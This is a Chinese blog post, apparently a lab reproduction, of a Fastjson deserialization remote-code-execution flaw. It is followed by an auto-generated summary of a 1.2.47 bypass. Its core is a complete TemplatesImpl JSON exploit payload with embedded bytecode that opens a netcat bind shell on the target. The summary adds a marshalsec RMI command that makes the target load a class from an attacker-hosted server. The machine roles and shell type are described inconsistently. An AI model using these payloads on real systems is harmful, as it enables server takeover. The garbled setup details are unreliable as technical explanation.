Fastjson1.0漏洞复现

本文详细介绍使用Kalilinux作为攻击机,针对目标系统进行渗透测试的过程。通过生成并利用payload,成功在Win10环境下反弹shell,实现远程控制。文章深入探讨了nc命令在反弹shell中的应用,确保靶机能执行nc命令是关键步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

服务器kali linux
攻击机win10
搭建好环境之后,测试漏洞
在这里插入图片描述
证明存在漏洞
生成payload
{"@type":“com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl”,"_bytecodes":[“yv66vgAAADQAsAcAAgEAF2NvbS9zZWNmcmVlL3d3dy9QYXlsb2FkBwAEAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEABjxpbml0PgEAAygpVgEABENvZGUKAAMACQwABQAGCgALAA0HAAwBABFqYXZhL2xhbmcvUnVudGltZQwADgAPAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwgAEQEAGm5jIC1sIC1wIDY2NjYgLWUgL2Jpbi9iYXNoCgALABMMABQAFQEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsKABcAGQcAGAEAE2phdmEvaW8vSU9FeGNlcHRpb24MABoABgEAD3ByaW50U3RhY2tUcmFjZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABlMY29tL3NlY2ZyZWUvd3d3L1BheWxvYWQ7AQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAApFeGNlcHRpb25zBwAmAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAJcmVhZENsYXNzAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsHADMBABtqYXZhc3Npc3QvTm90Rm91bmRFeGNlcHRpb24HADUBACBqYXZhc3Npc3QvQ2Fubm90Q29tcGlsZUV4Y2VwdGlvbgoANwA5BwA4AQATamF2YXNzaXN0L0NsYXNzUG9vbAwAOgA7AQAKZ2V0RGVmYXVsdAEAFygpTGphdmFzc2lzdC9DbGFzc1Bvb2w7CgA3AD0MAD4APwEAA2dldAEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmFzc2lzdC9DdENsYXNzOwoAQQBDBwBCAQARamF2YXNzaXN0L0N0Q2xhc3MMAEQARQEACnRvQnl0ZWNvZGUBAAQoKVtCCgBHAEkHAEgBABBqYXZhL3V0aWwvQmFzZTY0DABKAEsBAApnZXRFbmNvZGVyAQAcKClMamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyOwoATQBPBwBOAQAYamF2YS91dGlsL0Jhc2U2NCRFbmNvZGVyDABQAFEBAA5lbmNvZGVUb1N0cmluZwEAFihbQilMamF2YS9sYW5nL1N0cmluZzsBAAljbGFzc25hbWUBABJMamF2YS9sYW5nL1N0cmluZzsBAAJjcAEAFUxqYXZhc3Npc3QvQ2xhc3NQb29sOwEAAmNjAQATTGphdmFzc2lzdC9DdENsYXNzOwEAAWIBAAJbQgEAB3BheWxvYWQBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwcAXQEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyCABfAQBVeyJAdHlwZSI6ImNvbS5zdW4ub3JnLmFwYWNoZS54YWxhbi5pbnRlcm5hbC54c2x0Yy50cmF4LlRlbXBsYXRlc0ltcGwiLCJfYnl0ZWNvZGVzIjpbIgoAXABhDAAFAGIBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYIAGQBABdjb20uc2VjZnJlZS53d3cuUGF5bG9hZAoAAQBmDAAwADEKAFwAaAwAaQBqAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7CABsAQADIl0sCABuAQAPIl9uYW1lIjoic2hpdCIsCABwAQAPIl90ZmFjdG9yeSI6e30sCAByAQAWIl9vdXRwdXRQcm9wZXJ0aWVzIjp7fQgAdAEAAX0KAFwAdgwAdwBbAQAIdG9TdHJpbmcBAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgkAewB9BwB8AQAQamF2YS9sYW5nL1N5c3RlbQwAfgB/AQADb3V0AQAVTGphdmEvaW8vUHJpbnRTdHJlYW07CACBAQBFKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqCgCDAIUHAIQBABNqYXZhL2lvL1ByaW50U3RyZWFtDACGAGIBAAdwcmludGxuCACIAQBFKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqCACKAQBNKiAgICAgICAgICAgICAgICAgIEZhc3Rqc29uIOWPjeW6j+WIl+WMluWPjeW8uSBTaGVsbCDohJrmnKwgICAgICAgICAgICAgICAgICoIAIwBAEUqICAgICAgICAgICAgICAgICAgICAgICAgICB3d3cuc2VjZnJlZS5jb20gICAgICAgICAgICAgICAgICAgICAgICAgICoIAI4BAEYqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioKCACQAQA5WypdIFVzYWdlOiBqYXZhIC1qYXIgRmFzdGpzb24tUGF5bG9hZC5qYXIgLS11c2UgMjAxNzAzMTUgCACSAQBpCSAyMDE3MDMxNSA9PiB7W0Zhc3Rqc29uIDw9IDEuMi4yNF0gW2h0dHBzOi8vZ2l0aHViLmNvbS9hbGliYWJhL2Zhc3Rqc29uL3dpa2kvc2VjdXJpdHlfdXBkYXRlXzIwMTcwMzE1XX0KCACUAQAIMjAxNzAzMTUKAJYAmAcAlwEAEGphdmEvbGFuZy9TdHJpbmcMAJkAmgEABmVxdWFscwEAFShMamF2YS9sYW5nL09iamVjdDspWggAnAEAKQpbKl0gVXNhZ2U6IFtGYXN0anNvbiBWZXJzaW9uIDw9IDEuMi4yNF0KCACeAQAoWytdIGNvbW1hbmQ6IG5jIC1sIC1wIDY2NjYgLWUgL2Jpbi9iYXNoCggAoAEAGFsqXSBHZW5lcmF0ZSBQYXlsb2FkOgoKCgoAAQCiDABaAFsIAKQBAAIKCggApgEAGlsrXSBTaGVsbDogbmMgYXR0YWNrIDY2NjYKCgCDAKgMAKkAYgEABXByaW50AQAEYXJncwEAE1tMamF2YS9sYW5nL1N0cmluZzsBAApTb3VyY2VGaWxlAQAMUGF5bG9hZC5qYXZhAQAMSW5uZXJDbGFzc2VzAQAHRW5jb2RlcgAhAAEAAwAAAAAABgABAAUABgABAAcAAAB4AAIAAgAAABYqtwAIuAAKEhC2ABJXpwAITCu2ABaxAAEABAANABAAFwADABsAAAAWAAUAAAAcAAQAHgANAB8AEQAgABUAIgAcAAAAFgACAAAAFgAdAB4AAAARAAQAHwAgAAEAIQAAABAAAv8AEAABBwABAAEHABcEAAEAIgAjAAIAJAAAAAQAAQAlAAcAAAA/AAAAAwAAAAGxAAAAAgAbAAAABgABAAAAJAAcAAAAIAADAAAAAQAdAB4AAAAAAAEAJwAoAAEAAAABACkAKgACAAEAIgArAAIAJAAAAAQAAQAlAAcAAABJAAAABAAAAAGxAAAAAgAbAAAABgABAAAAJwAcAAAAKgAEAAAAAQAdAB4AAAAAAAEAJwAoAAEAAAABACwALQACAAAAAQAuAC8AAwAJADAAMQACACQAAAAIAAMAFwAyADQABwAAAGsAAgAEAAAAF7gANkwrKrYAPE0stgBATrgARi22AEywAAAAAgAbAAAAEgAEAAAAKgAEACsACgAsAA8ALQAcAAAAKgAEAAAAFwBSAFMAAAAEABMAVABVAAEACgANAFYAVwACAA8ACABYAFkAAwAJAFoAWwACACQAAAAIAAMAFwAyADQABwAAAGYAAwAAAAAALrsAXFkSXrcAYBJjuABltgBnEmu2AGcSbbYAZxJvtgBnEnG2AGcSc7YAZ7YAdbAAAAACABsAAAAeAAcAAAAxAAkAMwAWADQAGwA1ACAANgAlADcAKgAxABwAAAACAAAACQB4AHkAAgAkAAAACAADABcAMgA0AAcAAAEDAAQAAQAAAJEqvp0ATrIAehKAtgCCsgB6Eoe2AIKyAHoSibYAgrIAehKHtgCCsgB6Eou2AIKyAHoSh7YAgrIAehKNtgCCsgB6Eo+2AIKyAHoSkbYAgqcAQxKTKgQytgCVmQA4sgB6Epu2AIKyAHoSnbYAgrIAersAXFkSn7cAYLgAobYAZxKjtgBntgB1tgCCsgB6EqW2AKexAAAAAwAbAAAAQgAQAAAAOwAFADwADQA9ABUAPgAdAD8AJQBAAC0AQQA1AEIAPQBDAEUARABNAEUAWwBGAGMARwBrAEgAiABJAJAATwAcAAAADAABAAAAkQCqAKsAAAAhAAAABgAC+wBQPwACAKwAAAACAK0ArgAAAAoAAQBNAEcArwAJ”],"_name":“shit”,"_tfactory":{},"_outputProperties":{}}

在这里插入图片描述

然后win10监听

在这里插入图片描述

成功弹回shell.

因为利用的是nc反弹,所以要确保靶机可以执行nc命令
靶机执行:nc -l -p 6666 -e /bin/bash
本机:nc 192.168.80.155(靶机地址) 6666

参考文章:https://www.secfree.com/article/591.html

根据引用\[1\]和引用\[2\]的内容,可以使用LDAP方法来利用fastjson1.2.47的漏洞。在实战情况下,推荐使用LDAP方法进行利用。fastjson1.2.47过滤了许多恶意类的上传姿势以及关闭了autoType,但是并不阻挡攻击者的攻击步骤。在fastjson中存在一个全局缓存,当有类进行加载时,如果autoType没有开启,会尝试从缓存中获取类,如果缓存中有,则直接返回。因此,可以通过上传一个带有恶意类的json数据,让它执行并存入缓存,从而绕过漏洞防护机制。\[2\] 具体的漏洞复现步骤如下: 1. 首先,需要启动一个RMI服务器,可以使用以下命令:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://本机IP:1222/#Exploit" 9999。这个命令将在本地的1222端口上启动一个RMI服务器,并将其绑定到9999端口上。\[3\] 2. 接下来,需要构造一个恶意的json数据,其中包含恶意类的payload。可以使用各种方法来构造这个json数据,例如手动编写或使用工具生成。 3. 将构造好的恶意json数据发送给目标系统,触发fastjson解析该数据的过程。 4.fastjson解析恶意json数据时,会尝试从缓存中获取类。由于autoType没有开启,fastjson会尝试从缓存中获取类,如果缓存中有,则直接返回。 5. 通过这种方式,攻击者可以绕过fastjson漏洞防护机制,执行恶意代码。 需要注意的是,漏洞复现仅用于安全研究和测试目的,未经授权的利用可能涉及违法行为,请遵守法律法规。 #### 引用[.reference_title] - *1* *3* [Fastjson命令执行漏洞复现1.2.47和1.2.24)](https://blog.csdn.net/xiaobai_20190815/article/details/124117105)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [fastjson1.2.47漏洞复现](https://blog.csdn.net/m0_63699746/article/details/131551535)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值